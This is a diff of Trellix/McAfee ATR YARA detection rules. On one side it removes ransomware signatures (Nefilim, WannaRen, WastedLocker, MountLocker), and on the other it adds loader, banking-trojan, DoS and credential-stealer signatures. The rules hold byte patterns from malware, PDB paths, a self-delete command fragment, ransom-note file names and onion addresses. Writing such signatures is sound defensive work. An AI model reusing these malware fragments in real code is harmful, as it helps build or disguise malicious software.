-		modified = "2020-04-03"
-		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L3-L48"
+		id = "f306e381-e2ae-528e-937b-aced72356d77"
+		date = "2025-06-01"
+		modified = "2020-08-14"
+		reference = "https://blog.avast.com/rietspoof-malware-increases-activity"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_rietspoof_loader.yar#L1-L22"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6"
-		logic_hash = "d8cd5d2dd552d3e9f57f7bd244e941fe89a96ab16bbcc71911e8e2a519f53f03"
+		logic_hash = "d72b58ff452070e03d0b25bc433ef5c677df77dd440adc1ecdb592cee24235fb"
 		score = 75
 		quality = 70
 		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
 		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nefilim"
+		malware_family = "Loader:W32/Rietspoof"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\Users\\Administrator\\Desktop\\New folder\\Release\\NEFILIM.pdb" fullword ascii
-		$s2 = "oh how i did it??? bypass sofos hah" fullword ascii
-		$s3 = " /c timeout /t 3 /nobreak && del \"" fullword wide
-		$s4 = "NEFILIM-DECRYPT.txt" fullword wide
-		$op0 = { db ff ff ff 55 8b ec 83 ec 24 53 56 57 89 55 f4 }
-		$op1 = { 60 be 00 d0 40 00 8d be 00 40 ff ff 57 eb 0b 90 }
-		$op2 = { 84 e0 40 00 90 d1 40 00 08 }
-		$bp = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????53568D??????????E8????????33??6A??5939????76??5783????75??8B????8D????A5A5A58D??????????A5508D????E8????????596A??588B????8D????80????75??48C6????79??EB??FE????33??8A??????8B????30????43413B????72??5F8B????8B????6A??2B??5E8A????88??404E75??5E5BC9C3558B??81??????????53FF????8D??????????50FF??????????68????????8D??????????50FF??????????33??53536A??535368????????8D??????????50FF??????????89????3B??0F84????????56578D????5053BE????????5689????FF??????????5056E8????????83????85??75??53FF??????????FF????8B??????????53FF??50FF??????????8D????51505689????FF??????????5056E8????????83????85??74??8B????89????8D????50FF????E8????????59595385??74??8D????50FF????FF????FF????FF??????????FF????53FF??50FF??????????5F5E5BC9C3558B??83????81??????????535657FF????8D????????????50FF??????????8B??????????68????????8D????????????50FF??8D??????508D????????????50FF??????????89??????83????0F84????????8B??????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????F6????????FF????8D????????????5074??FF??????????8D??????508D????????????50FF??68????????8D????????????50FF??8D????????????50E8????????E9????????FF??????????8D??????508D????????????50FF??8D??????50E8????????8B??C7????????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????8D??????50FF??85??74??8D????????????50E8????????598D??????50FF??????FF??????????85??0F85????????FF??????FF??????????5F5E5B8B??5DC3558B??81??????????53565768????????FF??????????8B??????????5033??57FF??8B??????????50FF??68????????89????FF??????????89????B8????????39????74??8B????2B??8A??FF????88????4039????75??57576A??575768????????FF????FF??????????89????3B??0F84????????8D????5150FF??????????6A??57FF??50FF??6A??5789????FF??50FF??FF????89????E8????????FF????E8????????595968????????57FF??50FF??68????????5789????FF??50FF??FF????8B????89????E8????????FF????8B????E8????????8B??????????59595757FF????FF????FF????FF??57FF??????????578D????5068????????FF????FF????FF??????????FF??????????83????0F84????????FF??????????83????0F84????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF????FF????FF??????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF??????????50FF????FF????FF??????????8B????8B????3B??0F8C????????7F??81??????????0F86????????89????89????3B??0F8C????????7F??3B??0F86????????EB??8B????2B????1B????89????0F88????????7F??81??????????0F82????????68????????57FF??50FF??????????5757FF????89????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????5757FF????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF??FF????5750FF??????????81????????????8B????11????39????0F8C????????0F8F????????8B????39????0F82????????E9????????3B??7C??7F??81??????????76??68????????57FF??50FF??????????575733??89????5133??50FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????575733??5050FF????FF??578D????5068????????EB??5157FF??50FF??????????575733??89????5133??50FF????FF??578D????50FF????FF????FF????FF??????????FF????8B????FF????FF????FF????E8????????83????575733??5050FF????FF??578D????50FF????FF????FF????FF??????????FF????57FF??50FF??????????FF????FF??????????FF????57FF??8B??????????50FF??FF???? }
+		$x1 = "\\Work\\d2Od7s43\\techloader\\loader" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or all of ( $op* ) or $bp
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule TRELLIX_ARC_Nefilim_Signed : RANSOMWARE FILE
+rule TRELLIX_ARC_Shifu : FINANCIAL
 {
 	meta:
-		description = "Rule to detect Nefilim samples digitally signed"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "a9a5daf0-4cfb-556a-b20a-72283fb1a0f9"
-		date = "2020-04-02"
+		description = "No description has been set in the source file - Trellix ARC"
+		author = "McAfee Labs"
+		id = "81e9ad25-1df0-5196-be8b-1d1d5d8e4387"
+		date = "2025-06-01"
 		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L50-L72"
+		reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Shifu.yar#L1-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5"
-		logic_hash = "7625eb7de1ebb2f5410552b8983379f213d639f5e146a5d951975b69eb8111d3"
+		logic_hash = "dfa6165f8d2750330c71dedbde293780d2bb27e8eb3635e47ca770ff7b9a9d63"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nefilim"
+		tags = "FINANCIAL"
+		malware_type = "financial"
+		malware_family = "Backdoor:W32/Shifu"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
+	strings:
+		$b = "RegCreateKeyA"
+		$a = "CryptCreateHash"
+		$c = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E}
+		$d = {53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65}
+		$e = {52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45}
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Red GmbH/CN=Red GmbH" and pe.signatures [ i ] . serial == "00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures [ i ] . thumbprint == "5b:19:58:8b:78:74:0a:4c:5d:08:41:99:dc:0f:52:a6:1f:38:00:99" )
+		all of them
 }
-rule TRELLIX_ARC_RANSOM_Nefilim_Go : RANSOMWARE FILE
+rule TRELLIX_ARC_Chikdos_Malware_Pdb : DOS FILE
 {
 	meta:
-		description = "Rule to detect the new Nefilim written in GO"
+		description = "Chikdos PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "a8809060-c646-5d54-88e7-c8054305ee6c"
-		date = "2020-07-13"
+		id = "0174ff2b-57fc-5578-b45e-c08bf8528ee8"
+		date = "2013-12-02"
 		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L74-L98"
+		reference = "http://hackermedicine.com/tag/trojan-chickdos/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_chickdos_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "a51fec27e478a1908fc58c96eb14f3719608ed925f1b44eb67bbcc67bd4c4099"
-		logic_hash = "f0b10286fb1623a32bcf1f30cadce2901f7711cb36db6bbe812f6c2e03862270"
+		hash = "c2a0e9f8e880ac22098d550a74940b1d81bc9fda06cebcf67f74782e55e9d9cc"
+		logic_hash = "150bf809a61aad00df0c49fb6a609b909c84ffb9ca442e143a6c5bf3dfc39314"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "DOS, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nefilim"
+		malware_type = "dos"
+		malware_family = "Dos:W32/ChickDos"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern = { FF20476F206275696C642049443A20226A744368374D37436A4A5732634C5F636633374A2F49625946794336635A64735F4D796A56633461642F486B6D36694A4D39327847785F4F2D65746744692F664E37434C43622D59716E374D795947565A686F220A20FFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108766B83EC0CC744241400000000C7442418000000008B4424108400890424E88D0200008B44240485C0740789C183F8FF7514C744241400000000C74424180000000083C40CC3894C24088B44241083C004890424E8570200008B4424048B4C2408894C24148944241883C40CC3E8AE5A0400E979FFFFFFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EC00000083EC108B44241885C00F84C30000008B4424148400890424E8FD0100008B44240485C0742E89C183F8FF74E38B44241839C10F85800000008B44241C894424048B44241483C004890424E88B12000083C410C3E8620303008B442414890424C744240400000000C7442408FFFFFFFFE8A61200000FB644240C84C07507E868030300EB8B8B44241C894424048B4424148D4804890C24E83F1200008B442418894424048B442414890424E82B120000E83603030083C410C38D05408E4E008904248D05B8CC510089442404E8DA3F02000F0B8D05408E4E008904248D05B0CC510089442404E8C03F02000F0BE899590400E9F4FEFFFFCCCCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B4424088B4C240CF00FB14D000F94442410C3CCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B44240889C1F00FC1450001C1894C240CC3CCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B7424088B7C240C8B45008B550489C389D101F311F9F00FC74D0075F1895C2410894C2414C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B442404A90700000074068B05000000000F6F000F7F4424080F77C3CCCCCCCCE9CBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9BBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C24048B442408874500C3CCCCCCCCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B4424040FBCC074058944240CC38B4424080FBCC0740883C0208944240CC3C744240C40000000C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC83EC208B4424248B088B54242889CB01D1894C241C8B6804890424895C2404896C2408894C240C8B5C242C11DD896C2418896C2410E8160100000FB644241484C074C08B44241C894424308B4424188944243483C420C3CCCCCCCCCCCCCCCCCC83EC208B4424248B08894C24188B50048954241C890424894C2404895424088B5C2428895C240C8B6C242C896C2410E8BC0000000FB644241484C074C68B442418894424308B44241C8944243483C420C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9EBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DB000000CCCCCCCCCCCCCCCCCCCCCCE97B000000CCCCCCCCCCCCCCCCCCCCCCE9CB000000CCCCCCCCCCCCCCCCCCCCCCE9BBFEFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B2D000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCC8B5C24048B44240889C1F00FC10301C88944240CC3CCCCCCCCCCCCCCCCCCCCCC8B5C24048B44240887038944240CC3CCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B442404A90700000074068B05000000008D5C24080F6F000F7F030F77C3CCCC8B442404A90700000074068B05000000000F6F4424080F7F000F77B800000000F00FC10424C3CCCCCCCCCCCCCCCCCCCC8B4424048A5C2408F00818C3CCCCCCCC8B4424048A5C2408F02018C3CCCCCCCC648B0D140000008B89000000003B610876098B4424088944240CC3E860550400EBDECCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240801000000E8AF4400008B44240C8944241C83C410C3E80E550400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240802000000E85F4400008B44240C8944241C83C410C3E8BE540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240810000000E80F4400008B44240C8944241C83C410C3E86E540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC83EC108D42048B008B4C2414890C248B4C2418894C240489442408E8D04300008B44240C8944241C83C410C3CCCCCCCC648B0D140000008B89000000003B6108762C83EC108B4424148B088B400489442408890C248B44241889442404E88E4300008B44240C8944241C83C410C3E8ED530400EBBBCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B600000083EC108B442414F30F10000F57C90F2EC175060F8B860000000F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240804000000E8C74200008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E80F530400E92AFFFFFFCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B800000083EC108B442414F20F10000F57C9660F2EC175060F8B87000000660F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240808000000E8E54100008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E82D520400E928FFFFFFCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E815FEFFFF8B44241083C0048B4C2408890424894C2404E8FEFDFFFF8B4424088944241883C40CC3E8CD510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E895FEFFFF8B44241083C0088B4C2408890424894C2404E87EFEFFFF8B4424088944241883C40CC3E86D510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86F200000083EC248B4424288B0885C974678B49048B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E8B2FA03008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8F46603008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E81E8E00008B44240C8B4C2408890C2489442404E87A3602000F0BE853500400E9EEFEFFFFCCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EF00000083EC248B4424288B0885C974648B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E895F903008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8D76503008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E8018D00008B44240C8B4C2408890C2489442404E85D3502000F0BE8364F0400E9F1FEFFFFCC648B0D140000008B89000000003B61087606C644240C01C3 }
+		$pdb = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and any of them
 }
-rule TRELLIX_ARC_Wannaren_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_STEALER_Credstealesy : STEALER
 {
 	meta:
-		description = "Rule to detect WannaRen Ransomware"
-		author = "McAfee ATR Team"
-		id = "f4f30d12-547d-5044-a4e5-b88bf359480f"
-		date = "2020-04-25"
-		modified = "2020-10-12"
-		reference = "https://blog.360totalsecurity.com/en/attention-you-may-have-become-a-susceptible-group-of-wannaren-ransomware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_wannaren.yar#L1-L34"
+		description = "Generic Rule to detect the CredStealer Malware"
+		author = "IsecG – McAfee Labs"
+		id = "90e23ed8-3243-519b-8eb4-9db5902c73d3"
+		date = "2015-05-08"
+		modified = "2020-08-14"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/when-hackers-get-hacked-the-malware-servers-of-a-data-stealing-campaign/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_credstealer.yar#L1-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "7b364f1c854e6891c8d09766bcc9a49420e0b5b4084d74aa331ae94e2cfb7e1d"
-		logic_hash = "0feb913b84eb0ecdda688f0cf0a5051798fe4fbce8a6ea959825985a81a6699c"
+		logic_hash = "3d007fc0d2e2eb3d8f0c2b86dd01ede482e72f6c67fd6d284d77c47b53021b3c"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "STEALER"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/WannaRen"
+		malware_type = "stealer"
+		malware_family = "Stealer:W32/CredStealer"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$sq0 = { 92 93 a91c2ea521 59 334826 }
-		$sq1 = { d0ce 6641 c1e9c0 41 80f652 49 c1f94d }
-		$sq2 = { 80f8b5 4d 63c9 f9 4d 03d9 41 }
-		$sq3 = { 34b7 d2ea 660fbafa56 0f99c2 32d8 660fbafaed 99 }
-		$sq4 = { f9 f7c70012355f 35c01f5226 f9 8d8056c800b0 f6c4b2 f9 }
-		$sq5 = { f5 f9 44 3aeb 45 33cd 41 }
-		$sq6 = { 890f c0ff12 44 b4a3 ee 2b4e70 7361 }
-		$sq7 = { 81c502000000 6689542500 6681d97a1e 660fabe1 660fbae1a5 8b0f 8dbf04000000 }
-		$sq8 = { 8d13 de11 d7 677846 f1 0d8cd45f87 bb34b98f33 }
-		$sq9 = { 1440 4b 41 e8???????? 397c0847 }
+		$my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide
+		$my_hex_string2 = {89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 21000KB and 7 of them
+		$my_hex_string and $my_hex_string2
 }
-rule TRELLIX_ARC_RANSOM_Wastedlocker : RANSOMWARE FILE
+rule TRELLIX_ARC_STEALER_Emirates_Statement : STEALER
 {
 	meta:
-		description = "Rule to detect unpacked samples of WastedLocker"
-		author = "McAfee ATR Team"
-		id = "900923cf-75c0-5342-858d-fe1ffa9486bd"
-		date = "2020-07-27"
-		modified = "2020-10-12"
+		description = "Credentials Stealing Attack"
+		author = "Christiaan Beek | McAfee ATR Team"
+		id = "b5a6d996-8a3d-5238-95af-bf5ff893bbc5"
+		date = "2013-06-30"
+		modified = "2020-08-14"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_wastedlocker.yar#L1-L32"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_EmiratesStatement.yar#L1-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "c5adf88a46c34c8683d0e3d70529b352c77209f004e6c638ff079ea025921781"
+		hash = "7cf757e0943b0a6598795156c156cb90feb7d87d4a22c01044499c4e1619ac57"
+		logic_hash = "17eaddf375fc1875fb0275f8c0f93dfe921b452bdc6eb471adc155f749492328"
 		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
+		quality = 45
+		tags = "STEALER"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/WastedLocker"
+		malware_type = "stealer"
+		malware_family = "Stealer:W32/DarkSide"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "ae255679f487e2e9075ffd5e8c7836dd425229c1e3bd40cfc46fbbceceec7cf4"
 
 	strings:
-		$pattern_0 = { 8d45fc 50 53 53 6a19 ff75f8 }
-		$pattern_1 = { 66833b00 8bf3 0f8485000000 8b7d10 8b472c 85c0 7410 }
-		$pattern_2 = { e8???????? 8b4d08 8b4518 8d0441 6683600200 83c40c 837d1400 }
-		$pattern_3 = { 8701 e9???????? 8bc7 5f 5e 5b }
-		$pattern_4 = { 8bf8 3bfb 742f 53 8d45fc 50 56 }
-		$pattern_5 = { 6a10 8d45f0 6a00 50 e8???????? 83c40c 5e }
-		$pattern_6 = { 5f 5d c20800 55 8bec }
-		$pattern_7 = { 8d7e04 ff15???????? 85c0 8945e8 740e 2b4510 }
-		$pattern_8 = { ff15???????? 8b45dc 8b4dbc 69c00d661900 055ff36e3c 8945dc }
-		$pattern_9 = { 8b4d08 8b19 03d8 f7d0 c1c60f 03f2 0bc6 }
+		$string0 = "msn.klm"
+		$string1 = "wmsn.klm"
+		$string2 = "bms.klm"
 
 	condition:
-		7 of them and filesize < 1806288
+		all of them
 }
-rule TRELLIX_ARC_RANSOM_Mountlocker : RANSOMWARE FILE
+rule TRELLIX_ARC_STEALER_Lokibot : STEALER FILE
 {
 	meta:
-		description = "Rule to detect Mount Locker ransomware"
-		author = "McAfee ATR Team"
-		id = "8451b78c-3cef-557a-a2e3-0767a0b0eddb"
-		date = "2020-09-25"
-		modified = "2020-10-12"
+		description = "Rule to detect Lokibot stealer"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "75f502a3-2d9f-5ccf-93f8-2d6a73e9e1b7"
+		date = "2020-09-23"
+		modified = "2020-09-25"
 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_mountlocker.yar#L1-L32"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_Lokibot.yar#L1-L39"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "fb332a6725b9276cca379dd3621943c69f88570fb317da27a857a2544d2aa4e0"
+		logic_hash = "999a69394a545f726cf15e4361e0dfc17eeac6544e6816a0ad140316e9642510"
 		score = 75
-		quality = 64
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "STEALER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/MountLocker"
+		malware_type = "stealer"
+		malware_family = "Ransomware:W32/Lokibot"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "4b917b60f4df6d6d08e895d179a22dcb7c38c6a6a6f39c96c3ded10368d86273"
-		hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963"
+		hash1 = "0e40f4fdd77e1f90279c585cfc787942b8474e5216ff4d324d952ef6b74f25d2"
+		hash2 = "3ad36afad12d8cf245904285c21a8db43f9ed9c82304fdc2f27c4dd1438e4a1d"
+		hash3 = "26fbdd516b3c1bfa36784ef35d6bc216baeb0ef2d0c0ba036ff9296da2ce2c84"
 
 	strings:
-		$s1 = {63 69 64 3d 25 43 4c 49 45 4e 54 5f 49 44}
-		$s2 = {7a 73 61 33 77 78 76 62 62 37 67 76 36 35 77 6e 6c 37 6c 65 72 73 6c 65 65 33 63 37 69 32 37 6e 64 71 67 68 71 6d 36 6a 74 32 70 72 69 76 61 32 71 63 64 70 6f 6e 61 64 2e 6f 6e 69 6f 6e}
-		$s3 = {36 6d 6c 7a 61 68 6b 63 37 76 65 6a 79 74 70 70 62 71 68 71 6a 6f 75 34 69 70 66 74 67 73 33 67 69 7a 6f 66 32 78 34 7a 6b 6c 62 6c 6c 69 61 79 68 73 71 62 33 77 61 64 2e 6f 6e 69 6f 6e}
+		$sq1 = { 55 8B EC 56 8B 75 08 57 56 E8 ?? ?? ?? ?? 8B F8 59 85 FF 75 04 33 C0 EB 20 56 6A 00 57 E8 ?? ?? ?? ?? 6A 0C E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 E5 83 60 08 00 89 38 89 70 04 5F 5E 5D C3 }
